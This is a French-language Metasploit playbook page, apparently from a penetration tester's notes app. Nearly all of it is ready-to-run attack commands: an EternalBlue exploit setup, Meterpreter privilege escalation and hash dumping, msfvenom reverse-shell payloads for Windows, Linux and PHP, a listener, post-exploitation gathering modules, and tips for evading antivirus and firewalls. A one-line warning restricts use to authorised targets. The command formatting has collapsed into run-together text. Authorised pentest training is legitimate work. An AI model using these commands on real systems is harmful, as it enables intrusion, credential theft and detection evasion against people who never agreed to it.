metasploitexploitationpentest
MDstable
NoteSnippetChecklistPlaybook
Metasploit Framework
Guide complet Metasploit : workflow, modules, Meterpreter, msfvenom, post-exploitation
playbookintermediate 2026-05-10 2 min read
metasploitexploitationpentestmeterpretermsfvenom
Objectifs
Utiliser Metasploit pour exploiter des vulnérabilités identifiées et établir un accès.
⚠ Attention — Utiliser uniquement sur des cibles autorisées. Documenter chaque exploit lancé avec timestamp.
Workflow de base
bash
Variables
{{TARGET}}
{{LHOST}}
{{LPORT}}
# Lancer msfconsolemsfconsole -q# Rechercher un modulesearch typeexploit nameeternalbluesearch cve2021-44228search platformwindows rankexcellent# Configurer et lanceruse exploit/windows/smb/ms17_010_eternalblueset RHOSTS {{TARGET}}set LHOST {{LHOST}}set LPORT {{LPORT}}checkrun
Gestion des sessions Meterpreter
bash
# Sessionssessions -lsessions -i 1sessions -u 1background# Commandes essentiellessysinfogetuidgetsystemhashdumppsmigrate 1234shellscreenshotdownload filetxt /tmp/upload shellexe CWindowsTemp
Msfvenom — Payloads
bash
Variables
{{LHOST}}
{{LPORT}}
# Windows exemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST{{LHOST}} LPORT{{LPORT}} -f exe -o shellexe# Linux elfmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST{{LHOST}} LPORT{{LPORT}} -f elf -o shellelf# PHP webshellmsfvenom -p php/meterpreter/reverse_tcp LHOST{{LHOST}} LPORT{{LPORT}} -f raw -o shellphp# Listeneruse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST {{LHOST}}set LPORT {{LPORT}}exploit -j
Post-exploitation modules
bash
run post/multi/recon/local_exploit_suggesterrun post/windows/gather/hashdumprun post/windows/gather/enum_applicationsrun post/multi/gather/ping_sweep RHOSTS19216810/24
Checklist Metasploit0/7
Pièges fréquents
- Antivirus : les payloads msfvenom sont détectés — utiliser un encoder ou obfuscation
- Arch : vérifier x86 vs x64 avant de générer un payload
- Firewall : si reverse_tcp bloqué, essayer reverse_https sur port 443
- Cleanup : supprimer TOUS les artefacts après pentest
OPS·BRAIN v1.075 notes · Securitylocal